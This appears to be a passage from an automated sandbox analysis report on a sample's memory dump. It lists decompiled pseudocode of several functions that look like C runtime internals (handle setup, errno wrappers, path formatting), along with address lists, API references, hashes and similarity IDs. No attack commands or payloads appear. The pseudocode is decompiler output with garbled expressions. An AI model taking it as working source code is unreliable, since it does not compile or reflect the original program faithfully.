                                                                                                                                                  Function 6770C258, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                  			E6770C258(intOrPtr __rax, long long __rbx, void* __rdx, long long __rdi) {
				signed int _t73;
				signed int _t79;
				signed char _t80;
				signed int _t81;
				signed int _t86;
				signed int _t88;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				long long _t101;
				struct _STARTUPINFOW* _t107;
				intOrPtr _t120;
				void* _t121;
				void* _t122;
				intOrPtr _t124;
				intOrPtr* _t126;
				void* _t127;
				long long _t128;
				long long _t129;
				long long* _t133;
				void* _t134;
				void* _t135;
				intOrPtr* _t138;
				void* _t141;
				signed char* _t143;
				struct _STARTUPINFOW* _t144;

				_t119 = __rdx;
				_t106 = __rbx;
				_t100 = __rax;
				 *((long long*)(_t134 + 8)) = __rbx;
				 *((long long*)(_t134 + 0x10)) = _t128;
				 *((long long*)(_t134 + 0x18)) = __rdi;
				_t135 = _t134 - 0x90;
				GetStartupInfoW(_t144);
				_t5 = _t119 - 0x38; // 0x20
				_t98 = _t5;
				_t73 = E6770C14C(__rbx, _t135 + 0x20, __rdx, __rdi, _t127, _t128, _t141, _t138);
				r14d = 0;
				_t120 = _t100;
				if(_t100 != 0) {
					 *0x67719900 = _t100;
					_t101 = _t100 + 0xb00;
					_t88 = _t98;
					 *0x677198e8 = _t88;
					if(_t120 >= _t101) {
						L6:
						if( *((intOrPtr*)(_t135 + 0x62)) == r14w) {
							L27:
							r12d = r14d;
							_t107 = _t144;
							do {
								_t124 =  *0x67719900;
								if( *((long long*)(_t107 + _t124)) == 0xffffffff ||  *((long long*)(_t107 + _t124)) == 0xfffffffe) {
									 *(_t107 + _t124 + 8) = 0x81;
									asm("sbb ecx, ecx");
									_t88 =  ==  ? 0xfffffff6 : _t88 + 0xfffffff5;
									GetStdHandle(??);
									_t129 = _t101;
									if(_t101 == 0xffffffff || _t101 == 0) {
										L40:
										 *(_t107 + _t124 + 8) =  *(_t107 + _t124 + 8) | 0x00000040;
										 *((long long*)(_t107 + _t124)) = 0xfffffffe;
										goto L41;
									} else {
										_t80 = GetFileType();
										if(_t80 == 0) {
											goto L40;
										}
										_t81 = _t80 & 0x000000ff;
										 *((long long*)(_t107 + _t124)) = _t129;
										if(_t81 != 2) {
											if(_t81 == 3) {
												 *(_t107 + _t124 + 8) =  *(_t107 + _t124 + 8) | 0x00000008;
											}
										} else {
											 *(_t107 + _t124 + 8) =  *(_t107 + _t124 + 8) | 0x00000040;
										}
										_t73 = InitializeCriticalSectionAndSpinCount();
										if(_t73 == 0) {
											goto L1;
										} else {
											 *((intOrPtr*)(_t107 + _t124 + 0xc)) =  *((intOrPtr*)(_t107 + _t124 + 0xc)) + 1;
											goto L41;
										}
									}
								} else {
									 *(_t107 + _t124 + 8) =  *(_t107 + _t124 + 8) | 0x00000080;
								}
								L41:
								_t107 = _t107 + 0x58;
								r12d = r12d + 1;
							} while (_t107 < 0x108);
							SetHandleCount();
							_t79 = 0;
							L43:
							return _t79;
						}
						_t101 =  *((intOrPtr*)(_t135 + 0x68));
						if(_t101 == 0) {
							goto L27;
						}
						_t143 = _t101 + 4;
						_t138 =  *_t101 + _t143;
						_t86 =  <  ?  *_t101 : 0x800;
						if(_t88 >= 0x800) {
							L18:
							_t97 = r14d;
							if(_t86 <= 0) {
								goto L27;
							} else {
								goto L19;
							}
							do {
								L19:
								if( *_t138 != 0xffffffff &&  *_t138 != 0xfffffffe && ( *_t143 & 0x00000001) != 0 && (( *_t143 & 0x00000008) != 0 || GetFileType() != 0)) {
									_t98 = _t98 & 0x0000001f;
									_t133 = _t97 * 0x58 +  *((intOrPtr*)(0x67719900 + (_t97 >> 5) * 8));
									_t101 =  *_t138;
									 *_t133 = _t101;
									 *((char*)(_t133 + 8)) =  *_t143;
									_t73 = InitializeCriticalSectionAndSpinCount(??, ??);
									if(_t73 == 0) {
										goto L1;
									}
									 *((intOrPtr*)(_t133 + 0xc)) =  *((intOrPtr*)(_t133 + 0xc)) + 1;
								}
								_t97 = _t97 + 1;
								_t143 =  &(_t143[1]);
								_t138 = _t138 + 8;
							} while (_t97 < _t86);
							goto L27;
						}
						_t126 = 0x67719908;
						while(1) {
							E6770C14C(_t106, _t128, _t120, _t126, _t127, _t128);
							if(_t101 == 0) {
								break;
							}
							_t18 = _t101 + 0xb00; // 0xb00
							 *_t126 = _t101;
							_t96 =  *0x677198e8 + _t98;
							 *0x677198e8 = _t96;
							if(_t101 >= _t18) {
								L15:
								_t126 = _t126 + 8;
								if(_t96 < _t86) {
									continue;
								}
								goto L18;
							}
							_t19 = _t101 + 9; // 0x9
							_t121 = _t19;
							do {
								 *(_t121 - 9) =  *(_t121 - 9) | 0xffffffff;
								 *(_t121 + 0x2f) =  *(_t121 + 0x2f) & 0x00000080;
								 *((short*)(_t121 - 1)) = 0xa00;
								 *(_t121 + 3) = r14d;
								 *((short*)(_t121 + 0x30)) = 0xa0a;
								 *(_t121 + 0x47) = r14d;
								 *((intOrPtr*)(_t121 + 0x43)) = r14b;
								_t121 = _t121 + 0x58;
								_t29 = _t121 - 9; // -88
								_t101 =  *_t126 + 0xb00;
							} while (_t29 < _t101);
							_t96 =  *0x677198e8;
							goto L15;
						}
						_t86 =  *0x677198e8;
						goto L18;
					}
					_t122 = _t120 + 9;
					do {
						 *(_t122 - 9) =  *(_t122 - 9) | 0xffffffff;
						 *((short*)(_t122 - 1)) = 0xa00;
						 *(_t122 + 3) = r14d;
						 *((short*)(_t122 + 0x2f)) = 0xa00;
						 *((char*)(_t122 + 0x31)) = 0xa;
						 *(_t122 + 0x47) = r14d;
						 *((intOrPtr*)(_t122 + 0x43)) = r14b;
						_t122 = _t122 + 0x58;
						_t14 = _t122 - 9; // -106
						_t101 =  *0x67719900 + 0xb00;
					} while (_t14 < _t101);
					_t88 =  *0x677198e8;
					goto L6;
				}
				L1:
				_t79 = _t73 | 0xffffffff;
				goto L43;
			}






























                                                                                                                                                  0x6770c258
                                                                                                                                                  0x6770c258
                                                                                                                                                  0x6770c258
                                                                                                                                                  0x6770c258
                                                                                                                                                  0x6770c25d
                                                                                                                                                  0x6770c262
                                                                                                                                                  0x6770c26d
                                                                                                                                                  0x6770c279
                                                                                                                                                  0x6770c284
                                                                                                                                                  0x6770c284
                                                                                                                                                  0x6770c289
                                                                                                                                                  0x6770c28e
                                                                                                                                                  0x6770c291
                                                                                                                                                  0x6770c297
                                                                                                                                                  0x6770c2a1
                                                                                                                                                  0x6770c2a8
                                                                                                                                                  0x6770c2ae
                                                                                                                                                  0x6770c2b0
                                                                                                                                                  0x6770c2b9
                                                                                                                                                  0x6770c300
                                                                                                                                                  0x6770c306
                                                                                                                                                  0x6770c440
                                                                                                                                                  0x6770c440
                                                                                                                                                  0x6770c443
                                                                                                                                                  0x6770c446
                                                                                                                                                  0x6770c446
                                                                                                                                                  0x6770c452
                                                                                                                                                  0x6770c46a
                                                                                                                                                  0x6770c476
                                                                                                                                                  0x6770c47e
                                                                                                                                                  0x6770c481
                                                                                                                                                  0x6770c487
                                                                                                                                                  0x6770c48e
                                                                                                                                                  0x6770c4dd
                                                                                                                                                  0x6770c4dd
                                                                                                                                                  0x6770c4e2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c495
                                                                                                                                                  0x6770c498
                                                                                                                                                  0x6770c4a0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c4a2
                                                                                                                                                  0x6770c4a5
                                                                                                                                                  0x6770c4ac
                                                                                                                                                  0x6770c4b8
                                                                                                                                                  0x6770c4ba
                                                                                                                                                  0x6770c4ba
                                                                                                                                                  0x6770c4ae
                                                                                                                                                  0x6770c4ae
                                                                                                                                                  0x6770c4ae
                                                                                                                                                  0x6770c4c9
                                                                                                                                                  0x6770c4d1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c4d7
                                                                                                                                                  0x6770c4d7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c4d7
                                                                                                                                                  0x6770c4d1
                                                                                                                                                  0x6770c45b
                                                                                                                                                  0x6770c45b
                                                                                                                                                  0x6770c45b
                                                                                                                                                  0x6770c4ea
                                                                                                                                                  0x6770c4ea
                                                                                                                                                  0x6770c4ee
                                                                                                                                                  0x6770c4f1
                                                                                                                                                  0x6770c504
                                                                                                                                                  0x6770c50a
                                                                                                                                                  0x6770c50c
                                                                                                                                                  0x6770c529
                                                                                                                                                  0x6770c529
                                                                                                                                                  0x6770c30c
                                                                                                                                                  0x6770c314
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c322
                                                                                                                                                  0x6770c326
                                                                                                                                                  0x6770c32b
                                                                                                                                                  0x6770c330
                                                                                                                                                  0x6770c3bd
                                                                                                                                                  0x6770c3bd
                                                                                                                                                  0x6770c3c2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c3c4
                                                                                                                                                  0x6770c3c4
                                                                                                                                                  0x6770c3c9
                                                                                                                                                  0x6770c400
                                                                                                                                                  0x6770c40b
                                                                                                                                                  0x6770c40f
                                                                                                                                                  0x6770c413
                                                                                                                                                  0x6770c41f
                                                                                                                                                  0x6770c422
                                                                                                                                                  0x6770c42a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c430
                                                                                                                                                  0x6770c430
                                                                                                                                                  0x6770c433
                                                                                                                                                  0x6770c435
                                                                                                                                                  0x6770c438
                                                                                                                                                  0x6770c43c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c3c4
                                                                                                                                                  0x6770c336
                                                                                                                                                  0x6770c33d
                                                                                                                                                  0x6770c345
                                                                                                                                                  0x6770c34d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c355
                                                                                                                                                  0x6770c35c
                                                                                                                                                  0x6770c35f
                                                                                                                                                  0x6770c361
                                                                                                                                                  0x6770c36a
                                                                                                                                                  0x6770c3ad
                                                                                                                                                  0x6770c3ad
                                                                                                                                                  0x6770c3b3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c3b5
                                                                                                                                                  0x6770c36c
                                                                                                                                                  0x6770c36c
                                                                                                                                                  0x6770c370
                                                                                                                                                  0x6770c370
                                                                                                                                                  0x6770c375
                                                                                                                                                  0x6770c379
                                                                                                                                                  0x6770c37f
                                                                                                                                                  0x6770c383
                                                                                                                                                  0x6770c389
                                                                                                                                                  0x6770c38d
                                                                                                                                                  0x6770c394
                                                                                                                                                  0x6770c398
                                                                                                                                                  0x6770c39c
                                                                                                                                                  0x6770c3a2
                                                                                                                                                  0x6770c3a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c3a7
                                                                                                                                                  0x6770c3b7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c3b7
                                                                                                                                                  0x6770c2bb
                                                                                                                                                  0x6770c2bf
                                                                                                                                                  0x6770c2bf
                                                                                                                                                  0x6770c2c4
                                                                                                                                                  0x6770c2ca
                                                                                                                                                  0x6770c2ce
                                                                                                                                                  0x6770c2d4
                                                                                                                                                  0x6770c2d8
                                                                                                                                                  0x6770c2dc
                                                                                                                                                  0x6770c2e7
                                                                                                                                                  0x6770c2eb
                                                                                                                                                  0x6770c2ef
                                                                                                                                                  0x6770c2f5
                                                                                                                                                  0x6770c2fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c2fa
                                                                                                                                                  0x6770c299
                                                                                                                                                  0x6770c299
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetStartupInfoW.KERNEL32 ref: 6770C279
                                                                                                                                                    • Part of subcall function 6770C14C: Sleep.KERNEL32(?,?,?,67708DEF,?,?,?,67708525,?,?,?,?,6770707E), ref: 6770C191
                                                                                                                                                  • GetFileType.KERNEL32 ref: 6770C3E4
                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 6770C422
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 3473179607-2766056989
                                                                                                                                                  • Opcode ID: e8bcf25941a183310ae79eeecb303b955b7f226587280043c7d33ce23e8fcbd6
                                                                                                                                                  • Instruction ID: a2e23bdcb433e110dde78a0cf6a59451b7d65e512a82df1de745b3b81e9f5a9f
                                                                                                                                                  • Opcode Fuzzy Hash: e8bcf25941a183310ae79eeecb303b955b7f226587280043c7d33ce23e8fcbd6
                                                                                                                                                  • Instruction Fuzzy Hash: C781D2B2318B8086DB00CF24D6843A977A6F759B79F588735DA7A477E4EB38C066C311
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67707DC4, Relevance: 13.6, APIs: 9, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E67707DC4(void* __edi, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, signed long long __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, intOrPtr* _a40, long long _a48) {
				long long _v32;
				long long _v40;
				void* __rdi;
				signed int _t20;
				signed int _t21;
				intOrPtr _t25;
				void* _t26;
				intOrPtr* _t32;
				intOrPtr* _t34;
				signed long long _t37;
				intOrPtr* _t45;
				void* _t47;
				void* _t50;
				void* _t55;

				_t55 = __r8;
				_t42 = __rdx;
				_t32 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				r13d = 0;
				_t50 = __r9;
				_t47 = __r8;
				_t37 = __rdx;
				_t45 = __rcx;
				if(__r9 == 0) {
					L18:
					E6770851C(_t32);
					 *_t32 = 0x16;
					L19:
					_t20 = E67709254();
					L20:
					_t21 = _t20 | 0xffffffff;
					L21:
					return _t21;
				}
				if(__r8 != 0) {
					if(__rcx == 0) {
						goto L18;
					}
					L6:
					if(_t42 == 0) {
						goto L18;
					}
					if(_t42 <= _t55) {
						E6770851C(_t32);
						r12d =  *_t32;
						_v32 = _a48;
						_t34 = _a40;
						_v40 = _t34;
						_t21 = E67707C2C(_t26, _t34, _t37, E6770B370, _t45, _t45, _t47, _t37, _t50);
						 *((intOrPtr*)(_t45 + _t37 * 2 - 2)) = r13w;
						if(_t21 != 0xfffffffe) {
							L15:
							if(_t21 >= 0) {
								goto L21;
							}
							L16:
							 *_t45 = r13w;
							if(_t21 != 0xfffffffe) {
								goto L20;
							}
							E6770851C(_t34);
							 *_t34 = 0x22;
							goto L19;
						}
						if(_t47 != 0xffffffff) {
							goto L16;
						}
						_t20 = E6770851C(_t34);
						if( *_t34 == 0x22) {
							_t20 = E6770851C(_t34);
							 *_t34 = r12d;
						}
						goto L20;
					}
					E6770851C(_t32);
					_t4 = _t47 + 1; // 0x75f
					_t25 =  *_t32;
					_v32 = _a48;
					_t34 = _a40;
					_v40 = _t34;
					_t21 = E67707C2C(_t26, _t34, _t37, E6770B370, _t45, _t45, _t47, _t4, _t50);
					if(_t21 != 0xfffffffe) {
						goto L15;
					}
					_t20 = E6770851C(_t34);
					if( *_t34 == 0x22) {
						_t20 = E6770851C(_t34);
						 *_t34 = _t25;
					}
					goto L20;
				}
				if(__rcx != 0) {
					goto L6;
				}
				if(__rdx != 0) {
					goto L18;
				} else {
					_t21 = 0;
					goto L21;
				}
			}

















                                                                                                                                                  0x67707dc4
                                                                                                                                                  0x67707dc4
                                                                                                                                                  0x67707dc4
                                                                                                                                                  0x67707dc4
                                                                                                                                                  0x67707dc9
                                                                                                                                                  0x67707dce
                                                                                                                                                  0x67707ddc
                                                                                                                                                  0x67707ddf
                                                                                                                                                  0x67707de2
                                                                                                                                                  0x67707de5
                                                                                                                                                  0x67707de8
                                                                                                                                                  0x67707dee
                                                                                                                                                  0x67707ee5
                                                                                                                                                  0x67707ee5
                                                                                                                                                  0x67707eea
                                                                                                                                                  0x67707ef0
                                                                                                                                                  0x67707ef0
                                                                                                                                                  0x67707ef5
                                                                                                                                                  0x67707ef5
                                                                                                                                                  0x67707ef8
                                                                                                                                                  0x67707f10
                                                                                                                                                  0x67707f10
                                                                                                                                                  0x67707df7
                                                                                                                                                  0x67707e11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707e17
                                                                                                                                                  0x67707e1a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707e23
                                                                                                                                                  0x67707e75
                                                                                                                                                  0x67707e84
                                                                                                                                                  0x67707e8f
                                                                                                                                                  0x67707e94
                                                                                                                                                  0x67707e9c
                                                                                                                                                  0x67707ea1
                                                                                                                                                  0x67707ea6
                                                                                                                                                  0x67707eaf
                                                                                                                                                  0x67707ecb
                                                                                                                                                  0x67707ecd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707ecf
                                                                                                                                                  0x67707ecf
                                                                                                                                                  0x67707ed6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707ed8
                                                                                                                                                  0x67707edd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707edd
                                                                                                                                                  0x67707eb5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707eb7
                                                                                                                                                  0x67707ebf
                                                                                                                                                  0x67707ec1
                                                                                                                                                  0x67707ec6
                                                                                                                                                  0x67707ec6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707ebf
                                                                                                                                                  0x67707e25
                                                                                                                                                  0x67707e2a
                                                                                                                                                  0x67707e35
                                                                                                                                                  0x67707e3f
                                                                                                                                                  0x67707e44
                                                                                                                                                  0x67707e4c
                                                                                                                                                  0x67707e51
                                                                                                                                                  0x67707e59
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707e5b
                                                                                                                                                  0x67707e63
                                                                                                                                                  0x67707e69
                                                                                                                                                  0x67707e6e
                                                                                                                                                  0x67707e6e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707e63
                                                                                                                                                  0x67707dfc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707e01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707e07
                                                                                                                                                  0x67707e07
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707e07

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2819658684-0
                                                                                                                                                  • Opcode ID: 2deb5084e770efe6fbbc7005f06cb7ef21867c46232145de43fff5d76e70b3e8
                                                                                                                                                  • Instruction ID: 16bae09605801c850a02f705fc5a1ad9794744d3125fabeb64b23c1393e9726d
                                                                                                                                                  • Opcode Fuzzy Hash: 2deb5084e770efe6fbbc7005f06cb7ef21867c46232145de43fff5d76e70b3e8
                                                                                                                                                  • Instruction Fuzzy Hash: 7231B0F6609B4085DF149F65AB4410EB3E5BB9CBB8F504A21DF6843BA4CB38C8618B91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67707330, Relevance: 13.6, APIs: 9, Instructions: 87COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E67707330(void* __edi, long long __rbx, char* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, intOrPtr* _a40, long long _a48) {
				long long _v16;
				long long _v24;
				signed int _t21;
				signed int _t22;
				intOrPtr _t26;
				void* _t27;
				intOrPtr* _t33;
				intOrPtr* _t35;
				void* _t38;
				char* _t47;
				void* _t50;
				void* _t53;
				intOrPtr* _t55;
				void* _t58;

				_t58 = __r8;
				_t43 = __rdx;
				_t33 = _t55;
				 *((long long*)(_t33 + 8)) = __rbx;
				 *((long long*)(_t33 + 0x10)) = __rbp;
				 *((long long*)(_t33 + 0x18)) = __rsi;
				 *((long long*)(_t33 + 0x20)) = __rdi;
				_t53 = __r9;
				_t50 = __r8;
				_t38 = __rdx;
				_t47 = __rcx;
				if(__r9 == 0) {
					L18:
					E6770851C(_t33);
					 *_t33 = 0x16;
					L19:
					_t21 = E67709254();
					L20:
					_t22 = _t21 | 0xffffffff;
					L21:
					return _t22;
				}
				if(__r8 != 0) {
					if(__rcx == 0) {
						goto L18;
					}
					L6:
					if(_t43 == 0) {
						goto L18;
					}
					if(_t43 <= _t58) {
						E6770851C(_t33);
						r12d =  *_t33;
						_v16 = _a48;
						_t35 = _a40;
						_v24 = _t35;
						_t22 = E677071D8(_t27, _t35, _t38, E67709650, _t47, _t47, _t50, _t38, _t53);
						 *((char*)(_t47 + _t38 - 1)) = 0;
						if(_t22 != 0xfffffffe) {
							L15:
							if(_t22 >= 0) {
								goto L21;
							}
							L16:
							 *_t47 = 0;
							if(_t22 != 0xfffffffe) {
								goto L20;
							}
							E6770851C(_t35);
							 *_t35 = 0x22;
							goto L19;
						}
						if(_t50 != 0xffffffff) {
							goto L16;
						}
						_t21 = E6770851C(_t35);
						if( *_t35 == 0x22) {
							_t21 = E6770851C(_t35);
							 *_t35 = r12d;
						}
						goto L20;
					}
					E6770851C(_t33);
					_t5 = _t50 + 1; // 0x4c
					_t26 =  *_t33;
					_v16 = _a48;
					_t35 = _a40;
					_v24 = _t35;
					_t22 = E677071D8(_t27, _t35, _t38, E67709650, _t47, _t47, _t50, _t5, _t53);
					if(_t22 != 0xfffffffe) {
						goto L15;
					}
					_t21 = E6770851C(_t35);
					if( *_t35 == 0x22) {
						_t21 = E6770851C(_t35);
						 *_t35 = _t26;
					}
					goto L20;
				}
				if(__rcx != 0) {
					goto L6;
				}
				if(__rdx != 0) {
					goto L18;
				} else {
					_t22 = 0;
					goto L21;
				}
			}

















                                                                                                                                                  0x67707330
                                                                                                                                                  0x67707330
                                                                                                                                                  0x67707330
                                                                                                                                                  0x67707333
                                                                                                                                                  0x67707337
                                                                                                                                                  0x6770733b
                                                                                                                                                  0x6770733f
                                                                                                                                                  0x67707349
                                                                                                                                                  0x6770734c
                                                                                                                                                  0x6770734f
                                                                                                                                                  0x67707352
                                                                                                                                                  0x67707358
                                                                                                                                                  0x6770744a
                                                                                                                                                  0x6770744a
                                                                                                                                                  0x6770744f
                                                                                                                                                  0x67707455
                                                                                                                                                  0x67707455
                                                                                                                                                  0x6770745a
                                                                                                                                                  0x6770745a
                                                                                                                                                  0x6770745d
                                                                                                                                                  0x67707477
                                                                                                                                                  0x67707477
                                                                                                                                                  0x67707361
                                                                                                                                                  0x6770737b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707381
                                                                                                                                                  0x67707384
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770738d
                                                                                                                                                  0x677073dc
                                                                                                                                                  0x677073eb
                                                                                                                                                  0x677073f6
                                                                                                                                                  0x677073fb
                                                                                                                                                  0x67707403
                                                                                                                                                  0x67707408
                                                                                                                                                  0x6770740d
                                                                                                                                                  0x67707415
                                                                                                                                                  0x67707431
                                                                                                                                                  0x67707433
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707435
                                                                                                                                                  0x67707435
                                                                                                                                                  0x6770743b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770743d
                                                                                                                                                  0x67707442
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707442
                                                                                                                                                  0x6770741b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770741d
                                                                                                                                                  0x67707425
                                                                                                                                                  0x67707427
                                                                                                                                                  0x6770742c
                                                                                                                                                  0x6770742c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707425
                                                                                                                                                  0x6770738f
                                                                                                                                                  0x67707394
                                                                                                                                                  0x6770739f
                                                                                                                                                  0x677073a9
                                                                                                                                                  0x677073ae
                                                                                                                                                  0x677073b6
                                                                                                                                                  0x677073bb
                                                                                                                                                  0x677073c3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677073c5
                                                                                                                                                  0x677073cd
                                                                                                                                                  0x677073d3
                                                                                                                                                  0x677073d8
                                                                                                                                                  0x677073d8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677073cd
                                                                                                                                                  0x67707366
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770736b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707371
                                                                                                                                                  0x67707371
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707371

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2819658684-0
                                                                                                                                                  • Opcode ID: f1ec586b488b3b4060c964ac92162ef71eba7cec725d40960c7d04f050846a9e
                                                                                                                                                  • Instruction ID: 11b49f9dd5d0ebd7402f5defadb2e310350333fbdeb6d6519c3b2d0b6513884a
                                                                                                                                                  • Opcode Fuzzy Hash: f1ec586b488b3b4060c964ac92162ef71eba7cec725d40960c7d04f050846a9e
                                                                                                                                                  • Instruction Fuzzy Hash: 2531BEF1648B8085DF108F61E74420DBBE5AB9DBE8F848A21EF6803794DB78C450CB92
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677041B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 52%
                                                                                                                                                  			E677041B0(long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v616;
				long long _v624;
				long long _v632;
				void* _t28;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				signed long long _t38;
				long long _t40;
				long long _t43;
				long long _t63;
				long long _t66;
				void* _t70;
				void* _t77;

				_t75 = __r9;
				_t43 = __rbx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t71 = _t70 - 0x290;
				_t38 =  *0x67716000; // 0x9b7b11e8241
				_v24 = _t38 ^ _t70 - 0x00000290;
				r9d = 0;
				_t40 =  &_v616;
				r8d = 0;
				_t6 = _t75 + 0x1c; // 0x1c
				_t31 = _t6;
				_v632 = _t40;
				if( *0x677188c0() == 0) {
					E677042D0(_t32, _t33, _t35, __eflags, __rbx, __rdx, __rsi);
					__eflags = _t40;
					if(__eflags == 0) {
						goto L1;
					} else {
						E67704338(0, _t31, _t34, __eflags, _t43, _t40, __rsi, __r8, __r9, _t77);
						_t66 = _t40;
						free(??);
						__eflags = _t66;
						if(_t66 != 0) {
							asm("repne scasw");
							asm("repne scasw");
							malloc(??);
							_t63 = _t40;
							__eflags = _t40;
							if(_t40 != 0) {
								_v624 = _t66;
								_v632 = "\\";
								_t28 = E67707158(L"%s%s%s",  &_v616);
								__eflags = _t28 - 0xffffffff;
								if(_t28 != 0xffffffff) {
									_t43 = _t63;
								}
								free();
							} else {
								free();
								goto L1;
							}
						}
					}
				} else {
					L1:
				}
				return E67706F80(0, _v24 ^ _t71);
			}





















                                                                                                                                                  0x677041b0
                                                                                                                                                  0x677041b0
                                                                                                                                                  0x677041b0
                                                                                                                                                  0x677041b5
                                                                                                                                                  0x677041ba
                                                                                                                                                  0x677041c0
